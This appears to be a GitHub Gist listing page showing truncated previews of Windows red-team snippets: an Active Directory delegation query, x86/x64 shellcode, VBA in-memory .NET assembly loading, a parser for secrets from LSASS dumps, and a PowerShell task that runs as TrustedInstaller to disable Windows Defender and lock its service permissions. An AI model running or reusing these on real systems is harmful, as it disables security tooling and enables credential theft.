This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % { | |
| $Entry = $_.GetDirectoryEntry() | |
| $SAM = $Entry.samAccountName[0] | |
| $DN = $Entry.distinguishedName[0] | |
| try { | |
| $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate) | |
| $Exp = $Cert.GetExpirationDateString() |
lpBunny
/ process_list_without_handles.cpp
Created
May 27, 2021 22:10
List process information including process architecture and username without opening any handles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * | |
| * List process information on windows without opening any handles, including process architecture and username | |
| * | |
| */ | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include <math.h> |
aaaddress1
/ x96shell_msgbox.asm
Created
May 7, 2021 07:31
x96 Windows Shellcode: one payload able to used in both 32-bit & 64-bit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; x96 shellcode (x32+x64) by [email protected] | |
| ; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
| section .text | |
| bits 32 | |
| _main: | |
| call entry | |
| entry: | |
| mov ax, cs | |
| sub ax, 0x23 | |
| jz retTo32b |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
TheWover
/ Find-Assemblies.ps1
Last active
June 6, 2022 17:53
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Param([parameter(Mandatory=$true, | |
| HelpMessage="Directory to search for .NET Assemblies in.")] | |
| $Directory, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to search recursively.")] | |
| [switch]$Recurse = $false, | |
| [parameter(Mandatory=$false, | |
| HelpMessage="Whether or not to include DLLs in the search.")] | |
| [switch]$DLLs = $false, | |
| [parameter(Mandatory=$false, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| BSD 3-Clause License | |
| Copyright (c) 2019 Odzhan. All rights reserved. | |
| Redistribution and use in source and binary forms, with or without | |
| modification, are permitted provided that the following conditions are met: | |
| * Redistributions of source code must retain the above copyright notice, this | |
| list of conditions and the following disclaimer. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| BSD 3-Clause License | |
| Copyright (c) 2019 Odzhan. All rights reserved. | |
| Redistribution and use in source and binary forms, with or without | |
| modification, are permitted provided that the following conditions are met: | |
| * Redistributions of source code must retain the above copyright notice, this | |
| list of conditions and the following disclaimer. |
OsirisTerje
/ NetFrameWork.Legacy.CI.yml
Created
November 14, 2019 19:08
Actions yml starter workflow for a .NetFramework build using the legacy project format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: NetFrameWork.Legacy.CI | |
| on: [push] | |
| jobs: | |
| build: | |
| runs-on: windows-latest | |
| steps: | |
| - uses: actions/checkout@v1 |
monoxgas
/ mscorlib_load_assembly.vba
Last active
May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
seajaysec
/ mymykat.sh
Last active
January 21, 2024 00:03
super rough plaintext secret parser for pypykatz dumps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # prereqs: pypykatz, all the dumps in current working dir | |
| mkdir ./ppktz_tickets 2>/dev/null | |
| ext='.dmp' | |
| for i in *$ext; do | |
| txtfile=${i::-3}txt | |
| secrets=${i::-3}secrets | |
| pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/; |
NewerOlder